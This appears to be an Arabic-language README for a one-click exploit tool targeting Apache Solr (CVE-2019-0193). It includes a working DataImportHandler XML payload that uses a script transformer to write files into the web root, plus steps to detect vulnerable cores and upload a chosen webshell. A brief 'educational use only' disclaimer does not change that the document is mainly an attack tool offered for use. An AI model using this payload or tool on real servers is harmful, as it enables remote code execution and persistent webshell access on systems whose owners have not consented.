
ApacheSolrRCE(CVE-2019-0193)ثغرة لكتابة شل بنقرة واحدة، المبدأ هو كتابة حصان من خلال تدفق ملف جافا يتم تنفيذه عبر الكود.
للاستخدام التعليمي والأكاديمي فقط في مجال أمن المعلومات، ولا تستخدمه للاختبارات أو الهجمات غير القانونية.
ApacheSolrRCE (CVE-2019-0193) يكتب شيل بنقرة واحدة، المبدأ هو كتابة حصان طروادة عبر تدفق ملف جافا يتم تنفيذه بواسطة الكود.
ملاحظة: المؤلف مبتدئ نسبيًا، إذا وجدت أخطاء أو لديك احتياجات أخرى، فقم بتنزيل الكود وتعديله بنفسك.
نظرًا لأن الـ payloads المتداولة على الإنترنت كلها لتنفيذ الأوامر، وليس من السهل تحميل webshell، لذلك كتبت هذا الـ payload (عند عرض 123456، فهذا يعني أن الكتابة تمت بنجاح).
ملاحظة: الأداة تساعد فقط في الاختبار، إذا لم تتمكن الأداة من الكتابة، يُنصح بالكتابة يدويًا.
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
<script><![CDATA[
function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;
}
]]></script>
<document>
<entity
stream="true"
name="entity1"
datasource="streamsrc1"
processor="XPathEntityProcessor"
rootEntity="true"
forEach="/RDF/item"
transformer="script:poc">
<field column="title" xpath="/RDF/item/title" />
</entity>
</document>
</dataConfig>
أولاً اضغط على 'الكشف' للحصول على core، وتحديد ما إذا كان هناك ثغرة.
ثم اضغط على 'getshell'.
ملاحظة: ضع webshell الخاص بك في مجلد shell، وستقوم الأداة بتحميلها تلقائيًا إلى القائمة المنسدلة.
الوكيل الافتراضي هو وكيل HTTP، المنفذ 8080، وهو محدد في الكود، يمكنك تعديله عن طريق إعادة الترجمة إذا كنت بحاجة.